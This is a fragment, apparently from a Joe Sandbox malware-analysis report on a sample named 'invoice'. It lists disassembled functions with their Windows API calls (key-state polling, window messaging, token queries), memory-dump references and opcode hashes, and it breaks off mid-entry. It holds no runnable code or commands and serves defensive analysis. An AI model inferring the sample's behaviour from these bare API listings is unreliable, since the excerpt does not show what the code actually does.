                        • Opcode ID: 05229eca49fea6ba84e3366506c036b477c95731d045a8f46a9b40e1a18cebe9
                        • Instruction ID: 4e9e68d51e56c9c0347aa500bc10a8cf5ee85dbece32689620e2292350c3d843
                        • Opcode Fuzzy Hash: 05229eca49fea6ba84e3366506c036b477c95731d045a8f46a9b40e1a18cebe9
                        • Instruction Fuzzy Hash: 93515A35A04205DFCF11EF64C985AAEBBF5EF09310F188099E849AB362CB75ED11EB50
                        Function 0100A088 Relevance: 7.6, APIs: 5, Instructions: 130COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2666e0166119e7c26ddf76af26edf69e15d153d96557a3ca8705db86565fe84a
                        • Instruction ID: a312c2aa34617959a84ef5091e230f6c5e8e6d2d40d5379f317e08c957be30f9
                        • Opcode Fuzzy Hash: 2666e0166119e7c26ddf76af26edf69e15d153d96557a3ca8705db86565fe84a
                        • Instruction Fuzzy Hash: DE41B535A00304EBFB62DF28CC44FE9BBA5EB093A0F0501A5F995A72D1C7359A41D750
                        Function 00F82344 Relevance: 7.6, APIs: 5, Instructions: 111keyboardCOMMON
                        Download Yara Rule
                        APIs
                        • GetCursorPos.USER32(?), ref: 00F82357
                        • ScreenToClient.USER32(010457B0,?), ref: 00F82374
                        • GetAsyncKeyState.USER32(00000001), ref: 00F82399
                        • GetAsyncKeyState.USER32(00000002), ref: 00F823A7
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: AsyncState$ClientCursorScreen
                        • String ID:
                        • API String ID: 4210589936-0
                        • Opcode ID: 3d1ad1c223882b6f2b8bd8518d33bd27b46f5369da95b85ee7da00737e878fb5
                        • Instruction ID: 9c84869200deee72041c7386003c587de2ef8aa136fb265bc522dc8adba7b116
                        • Opcode Fuzzy Hash: 3d1ad1c223882b6f2b8bd8518d33bd27b46f5369da95b85ee7da00737e878fb5
                        • Instruction Fuzzy Hash: FD41A275908106FBDF259F69C854AEEBB74FB05330F20432AF868A2291C7356950EFA0
                        Function 00FD6700 Relevance: 7.6, APIs: 5, Instructions: 97windowCOMMON
                        Download Yara Rule
                        APIs
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD673D
                        • TranslateAcceleratorW.USER32(?,?,?), ref: 00FD6789
                        • TranslateMessage.USER32(?), ref: 00FD67B2
                        • DispatchMessageW.USER32(?), ref: 00FD67BC
                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00FD67CB
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Message$PeekTranslate$AcceleratorDispatch
                        • String ID:
                        • API String ID: 2108273632-0
                        • Opcode ID: 4863ebc549deea9ccb369cbffeaaaec311b06b9b2d970e94ad593742768ee081
                        • Instruction ID: aac47dabdf741da6c937b28312643354bf09990b2f8a1e8b78fd41c6ebbf5dd2
                        • Opcode Fuzzy Hash: 4863ebc549deea9ccb369cbffeaaaec311b06b9b2d970e94ad593742768ee081
                        • Instruction Fuzzy Hash: EC31C471D0020B9FDB30DE709C84FB67BE9AF05318F180167E461C7295EB2AA449F750
                        Function 00FD8CE1 Relevance: 7.6, APIs: 5, Instructions: 89sleepwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetWindowRect.USER32(?,?), ref: 00FD8CF2
                        • PostMessageW.USER32(?,00000201,00000001), ref: 00FD8D9C
                        • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00FD8DA4
                        • PostMessageW.USER32(?,00000202,00000000), ref: 00FD8DB2
                        • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00FD8DBA
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessagePostSleep$RectWindow
                        • String ID:
                        • API String ID: 3382505437-0
                        • Opcode ID: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                        • Instruction ID: 4020331407656cb2fe93e9000af53cfa60437c6037d1fef52a9870b781d832f6
                        • Opcode Fuzzy Hash: a9390e74661093189f8f8a7f982c9f3dfb0b50399198e9c93290c0295b2caf93
                        • Instruction Fuzzy Hash: 4131E071900219EBDF20CF68DD4CA9E3BB6EB14325F14421AF925E62D0C7B49911EB90
                        Function 00FDB4AE Relevance: 7.6, APIs: 5, Instructions: 88windowCOMMON
                        Download Yara Rule
                        APIs
                        • IsWindowVisible.USER32(?), ref: 00FDB4C6
                        • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00FDB4E3
                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00FDB51B
                        • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00FDB541
                        • _wcsstr.LIBCMT ref: 00FDB54B
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                        • String ID:
                        • API String ID: 3902887630-0
                        • Opcode ID: 49a9b26f85d8e94bee4ff48eaa1eda7cf08a00fa099be8aa901d92e3fcfa1368
                        • Instruction ID: f6b7f24731312d1a526b116205c906c2ae07bdfe4f039f35ab3942acdefe6c71
                        • Opcode Fuzzy Hash: 49a9b26f85d8e94bee4ff48eaa1eda7cf08a00fa099be8aa901d92e3fcfa1368
                        • Instruction Fuzzy Hash: 6821F872604201BBEB259F39AC05F7B7BA9DB49760F09402AF805DA255EF65CC00B3A0
                        Function 0100B17F Relevance: 7.6, APIs: 5, Instructions: 85COMMON
                        Download Yara Rule
                        APIs
                          • Part of subcall function 00F82612: GetWindowLongW.USER32(?,000000EB), ref: 00F82623
                        • GetWindowLongW.USER32(?,000000F0), ref: 0100B1C6
                        • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0100B1EB
                        • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0100B203
                        • GetSystemMetrics.USER32(00000004), ref: 0100B22C
                        • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00FF0FA5,00000000), ref: 0100B24A
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$Long$MetricsSystem
                        • String ID:
                        • API String ID: 2294984445-0
                        • Opcode ID: 2fcce85c40dac9a38f11f785f053428e4feaa81e3a0b4db9d9ff82f2f3320599
                        • Instruction ID: bc3736e4b5b04d160e3602e599abb3f20fca8333f292927e36c4c3bb4e0dbc59
                        • Opcode Fuzzy Hash: 2fcce85c40dac9a38f11f785f053428e4feaa81e3a0b4db9d9ff82f2f3320599
                        • Instruction Fuzzy Hash: 8D219F75910616AFEB629F388C48B6E3BA4FB05721F114728FAA2D21D0E7359851DB90
                        Function 00FD95C9 Relevance: 7.6, APIs: 5, Instructions: 84windowCOMMON
                        Download Yara Rule
                        APIs
                        • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00FD95E2
                          • Part of subcall function 00F87D2C: _memmove.LIBCMT ref: 00F87D66
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9614
                        • __itow.LIBCMT ref: 00FD962C
                        • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00FD9654
                        • __itow.LIBCMT ref: 00FD9665
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: MessageSend$__itow$_memmove
                        • String ID:
                        • API String ID: 2983881199-0
                        • Opcode ID: d0c192c16c1266ba120fe710f964c5a35355f6bad4c43167ab8b8ad8dbf3ece8
                        • Instruction ID: 916d550dbd30211a6403a421a232e23488b3d00854d9bec30a5c11c0cd5a357a
                        • Opcode Fuzzy Hash: d0c192c16c1266ba120fe710f964c5a35355f6bad4c43167ab8b8ad8dbf3ece8
                        • Instruction Fuzzy Hash: 51210A31B042147BDB21ABA08C85EEE7BA9EF49720F080026F904DB340D6B4DD41B791
                        Function 00FF5B63 Relevance: 7.6, APIs: 5, Instructions: 70COMMON
                        Download Yara Rule
                        APIs
                        • IsWindow.USER32(00000000), ref: 00FF5B84
                        • GetForegroundWindow.USER32 ref: 00FF5B9B
                        • GetDC.USER32(00000000), ref: 00FF5BD7
                        • GetPixel.GDI32(00000000,?,00000003), ref: 00FF5BE3
                        • ReleaseDC.USER32(00000000,00000003), ref: 00FF5C1E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: Window$ForegroundPixelRelease
                        • String ID:
                        • API String ID: 4156661090-0
                        • Opcode ID: a4c74dd23ead81480cf1f759be6344cc4472db3c9ee0ca31dfafa39388e7b96e
                        • Instruction ID: d36716bc34a6a18633b5ab60e48e5367d160641f1d242cca9478d744e3669edd
                        • Opcode Fuzzy Hash: a4c74dd23ead81480cf1f759be6344cc4472db3c9ee0ca31dfafa39388e7b96e
                        • Instruction Fuzzy Hash: 3C21C335A00508AFD724EF65CC88AAAB7F5FF49310F048469F94AD7362CB79AD01EB50
                        Function 00F812F3 Relevance: 7.6, APIs: 5, Instructions: 67COMMON
                        Download Yara Rule
                        APIs
                        • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00F8134D
                        • SelectObject.GDI32(?,00000000), ref: 00F8135C
                        • BeginPath.GDI32(?), ref: 00F81373
                        • SelectObject.GDI32(?,00000000), ref: 00F8139C
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: ObjectSelect$BeginCreatePath
                        • String ID:
                        • API String ID: 3225163088-0
                        • Opcode ID: fb7595c9337a39f2378b6e9d243ec6d480acc0e62006ab36e241adcd1534ce50
                        • Instruction ID: b70b0242a9981a200282ed27ddd0289b09c28ee53ce054bee82e2cdda986b4f7
                        • Opcode Fuzzy Hash: fb7595c9337a39f2378b6e9d243ec6d480acc0e62006ab36e241adcd1534ce50
                        • Instruction Fuzzy Hash: C021A474C00208DFEB319F15DD847A93BE8FB04321F244319F494A6194DB7A9892EF90
                        Function 00FE4B3A Relevance: 7.6, APIs: 5, Instructions: 56synchronizationthreadwindowCOMMON
                        Download Yara Rule
                        APIs
                        • GetCurrentThreadId.KERNEL32 ref: 00FE4B61
                        • __beginthreadex.LIBCMT ref: 00FE4B7F
                        • MessageBoxW.USER32(?,?,?,?), ref: 00FE4B94
                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00FE4BAA
                        • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00FE4BB1
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                        • String ID:
                        • API String ID: 3824534824-0
                        • Opcode ID: f2369b8cb6df5143c981ffab13ad7692500dbc556417310f8c2e6d4bb7fade4c
                        • Instruction ID: 8824b48b70d2ac8d4c0919bd5ee78345ce42297e202dadfcc82c14618487596f
                        • Opcode Fuzzy Hash: f2369b8cb6df5143c981ffab13ad7692500dbc556417310f8c2e6d4bb7fade4c
                        • Instruction Fuzzy Hash: B0116BB6904245BBC7218FA8DD44ADF7FACEB8A330F14425AF854D3244C67ADC0097A1
                        Function 00FD852A Relevance: 7.5, APIs: 5, Instructions: 49memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00FD8546
                        • GetLastError.KERNEL32(?,00FD800A,?,?,?), ref: 00FD8550
                        • GetProcessHeap.KERNEL32(00000008,?,?,00FD800A,?,?,?), ref: 00FD855F
                        • HeapAlloc.KERNEL32(00000000,?,00FD800A,?,?,?), ref: 00FD8566
                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00FD857D
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 842720411-0
                        • Opcode ID: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                        • Instruction ID: 11c4cefc0847f345715796919785100315b77f45752bed19da87e9e521587560
                        • Opcode Fuzzy Hash: 6394a46cd6066510711e72b31c62c52e16e3c82de80d4b703daea778ad8c4d81
                        • Instruction Fuzzy Hash: 7C014F71600205AFDB315FA6EC48D6B7B7DEF4A3A5B18052AF849C2210DA329D01EB70
                        Function 00FE52EB Relevance: 7.5, APIs: 5, Instructions: 48sleepCOMMON
                        Download Yara Rule
                        APIs
                        • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5307
                        • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5315
                        • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE531D
                        • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00FE5327
                        • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00FE5363
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: PerformanceQuery$CounterSleep$Frequency
                        • String ID:
                        • API String ID: 2833360925-0
                        • Opcode ID: d358f7e95304fa7fc1b1ec6ec52890090c2add730077da82f55fd7c316770f44
                        • Instruction ID: 91a6fe779e24bf966e6a1007b2487a08b8bafbe2a3284dc411c8cdd7acc1e320
                        • Opcode Fuzzy Hash: d358f7e95304fa7fc1b1ec6ec52890090c2add730077da82f55fd7c316770f44
                        • Instruction Fuzzy Hash: 9901C431C05A1DDBDF20EFE5E8485EDBB79FB09710F040049E841F2144CBB59510A7A1
                        Function 00FD7432 Relevance: 7.5, APIs: 5, Instructions: 48stringCOMMON
                        Download Yara Rule
                        APIs
                        • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?,?,00FD777D), ref: 00FD744F
                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD746A
                        • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD7478
                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?), ref: 00FD7488
                        • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00FD736C,80070057,?,?), ref: 00FD7494
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: From$Prog$FreeStringTasklstrcmpi
                        • String ID:
                        • API String ID: 3897988419-0
                        • Opcode ID: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                        • Instruction ID: b6f33ab1ed62551982d279294304b107c361b072ed9b8ac762d6238283a205e1
                        • Opcode Fuzzy Hash: c30238d050091024e5ab900b8c361f9950a23f23ec05146eccc2c6ed47e202ac
                        • Instruction Fuzzy Hash: 7901D872600315FBD7229F24DC04BAA7FBDEB45761F144019FD04D6214E736DE00A790
                        Function 00FD83D1 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00FD83E8
                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00FD83F2
                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00FD8401
                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00FD8408
                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00FD841E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                        • Instruction ID: 483f51a7af7ac05e3a53eaaf371999c8da89f142f4462de1583e579ec51c7216
                        • Opcode Fuzzy Hash: 3dbbfbc3dbb43d16f0362b013a828170782e42a87750978d84b7a430a00bb5ef
                        • Instruction Fuzzy Hash: 3DF04431604306AFD7319F65DC89FAB3BADEF8A7A4F044416F945C6240CE669C41EB60
                        Function 00FD8432 Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON
                        Download Yara Rule
                        APIs
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00FD8449
                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8453
                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8462
                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD8469
                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00FD847F
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_0_2_f80000_invoice.jbxd
                        Similarity
                        • API ID: HeapInformationToken$AllocErrorLastProcess
                        • String ID:
                        • API String ID: 44706859-0
                        • Opcode ID: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                        • Instruction ID: 23e9733309af54381c93569574c3d33eee5a44526c55ec9863743f909d7123d3
                        • Opcode Fuzzy Hash: f05af9ff87271f13b1bdf89589c075423c6d09ec546c9d7f01ba6e697ec032e3
                        • Instruction Fuzzy Hash: 60F04431200306BFD7325FA5DC88E673FBDEF4A7A4F084116F945C7240CA659941EB60
                        Function 00FDC4A5 Relevance: 7.5, APIs: 5, Instructions: 41windowtimeCOMMON
                        Download Yara Rule
                        APIs
                        • GetDlgItem.USER32(?,000003E9), ref: 00FDC4B9
                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00FDC4D0
                        • MessageBeep.USER32(00000000), ref: 00FDC4E8
                        • KillTimer.USER32(?,0000040A), ref: 00FDC504
                        • EndDialog.USER32(?,00000001), ref: 00FDC51E
                        Memory Dump Source
                        • Source File: 00000000.00000002.1719449481.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                        • Associated: 00000000.00000002.1719431995.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.000000000100F000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719491514.0000000001034000.00000002.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719528720.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
                        • Associated: 00000000.00000002.1719544865.0000000001047000.00000002.00000001.01000000.00000003.sdmpDownload File
                        Joe Sandbox IDA Plugin
